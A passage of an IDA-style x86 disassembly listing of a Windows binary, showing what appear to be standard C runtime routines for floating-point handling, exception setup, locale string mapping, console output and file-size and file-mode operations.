loc_40FED8: ; CODE XREF: sub_40FE47+64�j
; sub_40FE47+68�j
push eax
call sub_40FD01
mov [esp+84h+var_84], 0FFFFh
push [ebp+arg_18]
call sub_41005D
fld [ebp+arg_10]
pop ecx
pop ecx
loc_40FEF2: ; CODE XREF: sub_40FE47+8F�j
mov ecx, [esp+80h+var_4]
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
sub_40FE47 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40FF01(double)
sub_40FF01 proc near ; CODE XREF: sub_40A6EF:loc_40A775�p
var_8 = qword ptr -8
arg_0 = qword ptr 4
push ecx
push ecx
fld [esp+8+arg_0]
frndint
fstp [esp+8+var_8]
fld [esp+8+var_8]
pop ecx
pop ecx
retn
sub_40FF01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FF12(double,int)
sub_40FF12 proc near ; CODE XREF: sub_40FF97+79�p
; sub_40FF97+8E�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
fld [ebp+arg_0]
mov ecx, dword ptr [ebp+arg_0+6]
fstp [ebp+var_8]
add eax, 3FEh
shl eax, 4
and ecx, 0FFFF800Fh
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_40FF12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF3C proc near ; CODE XREF: sub_40A6EF+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_40FF54
cmp [ebp+arg_0], edx
jnz short loc_40FF67
xor eax, eax
inc eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF54: ; CODE XREF: sub_40FF3C+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_40FF67
cmp [ebp+arg_0], edx
jnz short loc_40FF67
push 2
loc_40FF64: ; CODE XREF: sub_40FF3C+3C�j
; sub_40FF3C+55�j
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF67: ; CODE XREF: sub_40FF3C+11�j
; sub_40FF3C+1F�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_40FF7A
push 3
jmp short loc_40FF64
; ---------------------------------------------------------------------------
loc_40FF7A: ; CODE XREF: sub_40FF3C+38�j
cmp cx, 7FF0h
jnz short loc_40FF93
test [ebp+arg_4], 7FFFFh
jnz short loc_40FF8F
cmp [ebp+arg_0], edx
jz short loc_40FF93
loc_40FF8F: ; CODE XREF: sub_40FF3C+4C�j
push 4
jmp short loc_40FF64
; ---------------------------------------------------------------------------
loc_40FF93: ; CODE XREF: sub_40FF3C+43�j
; sub_40FF3C+51�j
xor eax, eax
pop ebp
retn
sub_40FF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FF97(double,int)
sub_40FF97 proc near ; CODE XREF: sub_40FB20+122�p
var_C = qword ptr -0Ch
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
fldz
fcom [ebp+arg_0]
fnstsw ax
test ah, 44h
jp short loc_40FFAD
xor edx, edx
jmp loc_41003F
; ---------------------------------------------------------------------------
loc_40FFAD: ; CODE XREF: sub_40FF97+D�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41001A
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_40FFC5
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41001A
loc_40FFC5: ; CODE XREF: sub_40FF97+27�j
fcomp [ebp+arg_0]
mov edx, 0FFFFFC03h
fnstsw ax
test ah, 41h
jnz short loc_40FFD9
xor eax, eax
inc eax
jmp short loc_40FFF1
; ---------------------------------------------------------------------------
loc_40FFD9: ; CODE XREF: sub_40FF97+3B�j
xor eax, eax
jmp short loc_40FFF1
; ---------------------------------------------------------------------------
loc_40FFDD: ; CODE XREF: sub_40FF97+5E�j
shl dword ptr [ebp+arg_0+4], 1
test dword ptr [ebp+arg_0], 80000000h
jz short loc_40FFED
or dword ptr [ebp+arg_0+4], 1
loc_40FFED: ; CODE XREF: sub_40FF97+50�j
shl dword ptr [ebp+arg_0], 1
dec edx
loc_40FFF1: ; CODE XREF: sub_40FF97+40�j
; sub_40FF97+44�j
test byte ptr [ebp+arg_0+6], 10h
jz short loc_40FFDD
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_410007
or word ptr [ebp+arg_0+6], 8000h
loc_410007: ; CODE XREF: sub_40FF97+68�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_40FF12
add esp, 0Ch
jmp short loc_41003F
; ---------------------------------------------------------------------------
loc_41001A: ; CODE XREF: sub_40FF97+1E�j
; sub_40FF97+2C�j
push ecx ; int
fstp st
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_40FF12
mov edx, dword ptr [ebp+arg_0+6]
shr edx, 4
and edx, 7FFh
add esp, 0Ch
sub edx, 3FEh
loc_41003F: ; CODE XREF: sub_40FF97+11�j
; sub_40FF97+81�j
mov eax, [ebp+arg_8]
mov [eax], edx
pop ebp
retn
sub_40FF97 endp
; =============== S U B R O U T I N E =======================================
sub_410046 proc near ; CODE XREF: sub_40F846+DC�p
var_4 = word ptr -4
push ecx
fstsw [esp+4+var_4]
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410046 endp
; =============== S U B R O U T I N E =======================================
sub_410051 proc near ; CODE XREF: sub_40F846:loc_40FA59�p
var_4 = word ptr -4
push ecx
fnstsw [esp+4+var_4]
fnclex
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410051 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41005D proc near ; CODE XREF: sub_40A6EF+13�p
; sub_40A6EF+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
not eax
and eax, [ebp+var_4]
or eax, ecx
movzx eax, ax
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41005D endp
; =============== S U B R O U T I N E =======================================
sub_410084 proc near ; CODE XREF: sub_40FB20+20�p
; sub_40FB20+3A�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 4
push ecx
push ecx
mov cl, byte ptr [esp+8+arg_0]
test cl, 1
jz short loc_41009A
fld ds:tbyte_4240E0
fistp [esp+8+arg_0]
wait
loc_41009A: ; CODE XREF: sub_410084+9�j
test cl, 8
jz short loc_4100AF
fstsw ax
fld ds:tbyte_4240E0
fstp [esp+8+var_8]
wait
fstsw ax
loc_4100AF: ; CODE XREF: sub_410084+19�j
test cl, 10h
jz short loc_4100BE
fld ds:tbyte_4240EC
fstp [esp+8+var_8]
wait
loc_4100BE: ; CODE XREF: sub_410084+2E�j
test cl, 4
jz short loc_4100CC
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_4100CC: ; CODE XREF: sub_410084+3D�j
test cl, 20h
jz short loc_4100D7
fldpi
fstp [esp+8+var_8]
wait
loc_4100D7: ; CODE XREF: sub_410084+4B�j
pop ecx
pop ecx
retn
sub_410084 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100DA proc near ; CODE XREF: sub_4134A7+243�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421908
call __SEH_prolog4
xor eax, eax
cmp ds:dword_433C7C, eax
jz short loc_410146
test byte ptr [ebp+arg_0], 40h
jz short loc_41013E
cmp ds:dword_4240F8, eax
jz short loc_41013E
mov [ebp+ms_exc.disabled], eax
ldmxcsr [ebp+arg_0]
jmp short loc_410135
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_41011F
cmp eax, 0C000001Dh
jz short loc_41011F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41011F: ; CODE XREF: sub_4100DA+39�j
; sub_4100DA+40�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and ds:dword_4240F8, 0
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_410135: ; CODE XREF: sub_4100DA+2B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_410146
; ---------------------------------------------------------------------------
loc_41013E: ; CODE XREF: sub_4100DA+1A�j
; sub_4100DA+22�j
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_410146: ; CODE XREF: sub_4100DA+14�j
; sub_4100DA+62�j
call __SEH_epilog4
retn
sub_4100DA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41014C proc near ; CODE XREF: sub_41019D+A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
movzx eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov dl, [ebp+arg_C]
test [ecx+eax+1Dh], dl
jnz short loc_41018B
cmp [ebp+arg_8], 0
jz short loc_410185
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, [ebp+arg_8]
jmp short loc_410187
; ---------------------------------------------------------------------------
loc_410185: ; CODE XREF: sub_41014C+25�j
xor eax, eax
loc_410187: ; CODE XREF: sub_41014C+37�j
test eax, eax
jz short loc_41018E
loc_41018B: ; CODE XREF: sub_41014C+1F�j
xor eax, eax
inc eax
loc_41018E: ; CODE XREF: sub_41014C+3D�j
cmp [ebp+var_4], 0
jz short locret_41019B
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_41019B: ; CODE XREF: sub_41014C+46�j
leave
retn
sub_41014C endp
; =============== S U B R O U T I N E =======================================
sub_41019D proc near ; CODE XREF: sub_40AB84+3F�p
; sub_40ACBC+53�p ...
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
push 0
call sub_41014C
add esp, 10h
retn
sub_41019D endp
; =============== S U B R O U T I N E =======================================
sub_4101B0 proc near ; CODE XREF: sub_40B11E+56�p
; sub_40B699+59�p ...
arg_0 = dword ptr 4
xor eax, eax
inc eax
cmp [esp+arg_0], 0
jnz short locret_4101BC
xor eax, eax
locret_4101BC: ; CODE XREF: sub_4101B0+8�j
retn
sub_4101B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_4101BD proc near ; CODE XREF: sub_40BE59:loc_40BE87�p
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
test ds:byte_4240FC, 1
push esi
jz short loc_4101EA
push 0Ah
call sub_409AB4
pop ecx
loc_4101EA: ; CODE XREF: sub_4101BD+23�j
call sub_40DD1C
test eax, eax
jz short loc_4101FB
push 16h
call sub_40DD29
pop ecx
loc_4101FB: ; CODE XREF: sub_4101BD+34�j
test ds:byte_4240FC, 2
jz loc_4102A8
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407B70
lea eax, [ebp+2A8h+var_328]
add esp, 0Ch
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
push 0
mov [ebp+2A8h+var_328], 40000015h
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call ds:dword_41D19C
lea eax, [ebp+2A8h+var_2D8]
push eax
call ds:dword_41D198 ; UnhandledExceptionFilter
loc_4102A8: ; CODE XREF: sub_4101BD+45�j
push 3
call sub_407AEA
int 3 ; Trap to Debugger
sub_4101BD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102B0 proc near ; CODE XREF: sub_40BF57+25A�p
; sub_40C33C+150�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push 6
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call ds:dword_41D054
test eax, eax
jnz short loc_4102E1
or eax, 0FFFFFFFFh
jmp short loc_4102EB
; ---------------------------------------------------------------------------
loc_4102E1: ; CODE XREF: sub_4102B0+2A�j
lea eax, [ebp+var_C]
push eax
call sub_403EBD
pop ecx
loc_4102EB: ; CODE XREF: sub_4102B0+2F�j
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_4102B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102F7 proc near ; CODE XREF: sub_40BF57+285�p
; sub_40BF57+336�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
mov [ebp+var_28], eax
mov eax, [ebp+arg_C]
push ebx
mov [ebp+var_30], eax
mov eax, [eax]
push esi
mov [ebp+var_24], eax
mov eax, [ebp+arg_0]
push edi
xor edi, edi
cmp eax, [ebp+arg_4]
mov [ebp+var_34], ecx
mov [ebp+var_20], edi
mov [ebp+var_2C], edi
jz loc_410494
mov esi, ds:dword_41D1B4
lea ecx, [ebp+var_18]
push ecx
push eax
call esi
test eax, eax
mov ebx, ds:dword_41D0A0
jz short loc_4103AA
cmp [ebp+var_18], 1
jnz short loc_4103AA
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call esi
test eax, eax
jz short loc_4103AA
cmp [ebp+var_18], 1
jnz short loc_4103AA
mov esi, [ebp+var_24]
cmp esi, 0FFFFFFFFh
mov [ebp+var_2C], 1
jnz short loc_410380
push [ebp+var_28]
call sub_404130
mov esi, eax
pop ecx
inc esi
loc_410380: ; CODE XREF: sub_4102F7+7B�j
cmp esi, edi
loc_410382: ; CODE XREF: sub_4102F7+C6�j
jle short loc_4103DF
cmp esi, 7FFFFFF0h
ja short loc_4103DF
lea eax, [esi+esi+8]
cmp eax, 400h
ja short loc_4103C6
call sub_4104B0
mov eax, esp
cmp eax, edi
jz short loc_4103DA
mov dword ptr [eax], 0CCCCh
jmp short loc_4103D7
; ---------------------------------------------------------------------------
loc_4103AA: ; CODE XREF: sub_4102F7+53�j
; sub_4102F7+59�j ...
push edi
push edi
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx
mov esi, eax
cmp esi, edi
jnz short loc_410382
loc_4103BF: ; CODE XREF: sub_4102F7+EE�j
xor eax, eax
jmp loc_410497
; ---------------------------------------------------------------------------
loc_4103C6: ; CODE XREF: sub_4102F7+9E�j
push eax
call sub_4036E0
cmp eax, edi
pop ecx
jz short loc_4103DA
mov dword ptr [eax], 0DDDDh
loc_4103D7: ; CODE XREF: sub_4102F7+B1�j
add eax, 8
loc_4103DA: ; CODE XREF: sub_4102F7+A9�j
; sub_4102F7+D8�j
mov [ebp+var_1C], eax
jmp short loc_4103E2
; ---------------------------------------------------------------------------
loc_4103DF: ; CODE XREF: sub_4102F7:loc_410382�j
; sub_4102F7+93�j
mov [ebp+var_1C], edi
loc_4103E2: ; CODE XREF: sub_4102F7+E6�j
cmp [ebp+var_1C], edi
jz short loc_4103BF
lea eax, [esi+esi]
push eax
push edi
push [ebp+var_1C]
call sub_407B70
add esp, 0Ch
push esi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx
test eax, eax
jz short loc_41048B
mov ebx, [ebp+var_34]
cmp ebx, edi
jz short loc_410430
push edi
push edi
push [ebp+arg_14]
push ebx
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ds:dword_41D138
test eax, eax
jz short loc_41048B
mov [ebp+var_20], ebx
jmp short loc_41048B
; ---------------------------------------------------------------------------
loc_410430: ; CODE XREF: sub_4102F7+11A�j
cmp [ebp+var_2C], edi
mov ebx, ds:dword_41D138
jnz short loc_41044F
push edi
push edi
push edi
push edi
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx
mov esi, eax
cmp esi, edi
jz short loc_41048B
loc_41044F: ; CODE XREF: sub_4102F7+142�j
push esi
push 1
call sub_40777A
cmp eax, edi
pop ecx
pop ecx
mov [ebp+var_20], eax
jz short loc_41048B
push edi
push edi
push esi
push eax
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx
cmp eax, edi
jnz short loc_410480
push [ebp+var_20]
call sub_403603
pop ecx
mov [ebp+var_20], edi
jmp short loc_41048B
; ---------------------------------------------------------------------------
loc_410480: ; CODE XREF: sub_4102F7+179�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_41048B
mov ecx, [ebp+var_30]
mov [ecx], eax
loc_41048B: ; CODE XREF: sub_4102F7+113�j
; sub_4102F7+132�j ...
push [ebp+var_1C]
call sub_40BF3C
pop ecx
loc_410494: ; CODE XREF: sub_4102F7+38�j
mov eax, [ebp+var_20]
loc_410497: ; CODE XREF: sub_4102F7+CA�j
lea esp, [ebp-40h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_4102F7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4104B0 proc near ; CODE XREF: sub_40BF57+F3�p
; sub_40BF57+1B1�p ...
arg_0 = byte ptr 4
push ecx
lea ecx, [esp+4+arg_0]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_411400
sub_4104B0 endp
; ---------------------------------------------------------------------------
push ecx
lea ecx, [esp+8]
sub ecx, eax
and ecx, 7
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_411400
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104DC proc near ; CODE XREF: sub_40CE5A+2A1�p
; sub_40CE5A+2C1�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
xor esi, esi
cmp ds:dword_424218, esi
jz short loc_410545
cmp ds:dword_424224, 0FFFFFFFEh
jnz short loc_410505
call sub_41142B
loc_410505: ; CODE XREF: sub_4104DC+22�j
mov eax, ds:dword_424224
cmp eax, 0FFFFFFFFh
jnz short loc_410515
loc_41050F: ; CODE XREF: sub_4104DC+56�j
; sub_4104DC+61�j ...
or ax, 0FFFFh
jmp short loc_410585
; ---------------------------------------------------------------------------
loc_410515: ; CODE XREF: sub_4104DC+31�j
push esi
lea ecx, [ebp+var_10]
push ecx
push 1
lea ecx, [ebp+arg_0]
push ecx
push eax
call ds:dword_41D0AC
test eax, eax
jnz short loc_410592
cmp ds:dword_424218, 2
jnz short loc_41050F
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_41050F
mov ds:dword_424218, esi
loc_410545: ; CODE XREF: sub_4104DC+19�j
push esi
push esi
push 5
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+arg_0]
push eax
push esi
call ds:dword_41D0B0
push eax
call ds:dword_41D138
mov ecx, ds:dword_424224
cmp ecx, 0FFFFFFFFh
jz short loc_41050F
push esi
lea edx, [ebp+var_10]
push edx
push eax
lea eax, [ebp+var_C]
push eax
push ecx
call ds:dword_41D0B4
test eax, eax
jz short loc_41050F
loc_410581: ; CODE XREF: sub_4104DC+C0�j
mov ax, [ebp+arg_0]
loc_410585: ; CODE XREF: sub_4104DC+37�j
mov ecx, [ebp+var_4]
xor ecx, ebp
pop esi
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_410592: ; CODE XREF: sub_4104DC+4D�j
mov ds:dword_424218, 1
jmp short loc_410581
sub_4104DC endp
; =============== S U B R O U T I N E =======================================
sub_41059E proc near ; DATA XREF: .kSjx934:off_423F80�o
; .kSjx934:off_423F84�o ...
push 2
call sub_40785D
pop ecx
retn
sub_41059E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105A7 proc near ; CODE XREF: sub_40E072+36F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
xor ebx, ebx
push 1
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_40CCBE
mov [ebp+var_18], eax
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_14], edx
jz short loc_41062D
push 2
push ebx
push ebx
push [ebp+arg_0]
call sub_40CCBE
mov ecx, eax
and ecx, edx
add esp, 10h
cmp ecx, 0FFFFFFFFh
jz short loc_41062D
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
sub esi, eax
sbb edi, edx
js loc_4106C2
jg short loc_410606
cmp esi, ebx
jbe loc_4106C2
loc_410606: ; CODE XREF: sub_4105A7+55�j
mov ebx, 1000h
push ebx
push 8
call ds:dword_41D100
push eax
call ds:dword_41D114
test eax, eax
mov [ebp+var_4], eax
jnz short loc_410639
call sub_4057D3
mov dword ptr [eax], 0Ch
loc_41062D: ; CODE XREF: sub_4105A7+2B�j
; sub_4105A7+43�j ...
call sub_4057D3
mov eax, [eax]
loc_410634: ; CODE XREF: sub_4105A7+1AF�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_410639: ; CODE XREF: sub_4105A7+79�j
push 8000h
push [ebp+arg_0]
call sub_4107CD
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_41064B: ; CODE XREF: sub_4105A7+CF�j
; sub_4105A7+D3�j
test edi, edi
jl short loc_410659
jg short loc_410655
cmp esi, ebx
jb short loc_410659
loc_410655: ; CODE XREF: sub_4105A7+A8�j
mov eax, ebx
jmp short loc_41065B
; ---------------------------------------------------------------------------
loc_410659: ; CODE XREF: sub_4105A7+A6�j
; sub_4105A7+AC�j
mov eax, esi
loc_41065B: ; CODE XREF: sub_4105A7+B0�j
push eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40CE5A
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4106A5
cdq
sub esi, eax
sbb edi, edx
js short loc_41067C
jg short loc_41064B
test esi, esi
ja short loc_41064B
loc_41067C: ; CODE XREF: sub_4105A7+CD�j
mov esi, [ebp+var_10]
loc_41067F: ; CODE XREF: sub_4105A7+119�j
push [ebp+var_8]
push [ebp+arg_0]
call sub_4107CD
pop ecx
pop ecx
push [ebp+var_4]
push 0
call ds:dword_41D100
push eax
call ds:dword_41D10C
xor ebx, ebx
jmp loc_41072B
; ---------------------------------------------------------------------------
loc_4106A5: ; CODE XREF: sub_4105A7+C6�j
call sub_4057E6
cmp dword ptr [eax], 5
jnz short loc_4106BA
call sub_4057D3
mov dword ptr [eax], 0Dh
loc_4106BA: ; CODE XREF: sub_4105A7+106�j
or esi, 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41067F
; ---------------------------------------------------------------------------
loc_4106C2: ; CODE XREF: sub_4105A7+4F�j
; sub_4105A7+59�j
cmp edi, ebx
jg short loc_410737
jl short loc_4106CC
cmp esi, ebx
jnb short loc_410737
loc_4106CC: ; CODE XREF: sub_4105A7+11F�j
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_41062D
push [ebp+arg_0]
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0A8
neg eax
sbb eax, eax
neg eax
dec eax
cdq
mov [ebp+var_10], eax
and eax, edx
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], edx
jnz short loc_410737
call sub_4057D3
mov dword ptr [eax], 0Dh
call sub_4057E6
mov esi, eax
call ds:dword_41D0F0
mov [esi], eax
mov esi, [ebp+var_10]
loc_41072B: ; CODE XREF: sub_4105A7+F9�j
and esi, [ebp+var_C]
cmp esi, 0FFFFFFFFh
jz loc_41062D
loc_410737: ; CODE XREF: sub_4105A7+11D�j
; sub_4105A7+123�j ...
push ebx
push [ebp+var_14]
push [ebp+var_18]
push [ebp+arg_0]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_41062D
xor eax, eax
jmp loc_410634
sub_4105A7 endp
; =============== S U B R O U T I N E =======================================
sub_41075B proc near ; CODE XREF: sub_40E072+322�p
; sub_40E072+37F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_40ED7D
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41077C
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41077C: ; CODE XREF: sub_41075B+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:dword_41D074
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41079D
call ds:dword_41D0F0
jmp short loc_41079F
; ---------------------------------------------------------------------------
loc_41079D: ; CODE XREF: sub_41075B+38�j
xor eax, eax
loc_41079F: ; CODE XREF: sub_41075B+40�j
test eax, eax
jz short loc_4107AF
push eax
call sub_4057F9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_4107CA
; ---------------------------------------------------------------------------
loc_4107AF: ; CODE XREF: sub_41075B+46�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_4107CA: ; CODE XREF: sub_41075B+52�j
pop edi
pop esi
retn
sub_41075B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4107CD proc near ; CODE XREF: sub_4105A7+9A�p
; sub_4105A7+DE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
mov eax, edx
sar eax, 5
and edx, 1Fh
imul edx, 28h
push ebx
mov ebx, [ebp+arg_4]
push esi
lea esi, ds:433CA0h[eax*4]
mov eax, [esi]
lea ecx, [eax+edx]
movzx eax, byte ptr [ecx+4]
and eax, 80h
mov [ebp+arg_0], eax
mov al, [ecx+24h]
add al, al
movsx eax, al
push edi
mov edi, 4000h
sar eax, 1
cmp ebx, edi
jz short loc_41085F
cmp ebx, 8000h
jz short loc_410859
cmp ebx, 10000h
jz short loc_410845
cmp ebx, 20000h
jz short loc_410845
cmp ebx, 40000h
jnz short loc_41086C
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 81h
or dl, 1
loc_410841: ; CODE XREF: sub_4107CD+8A�j
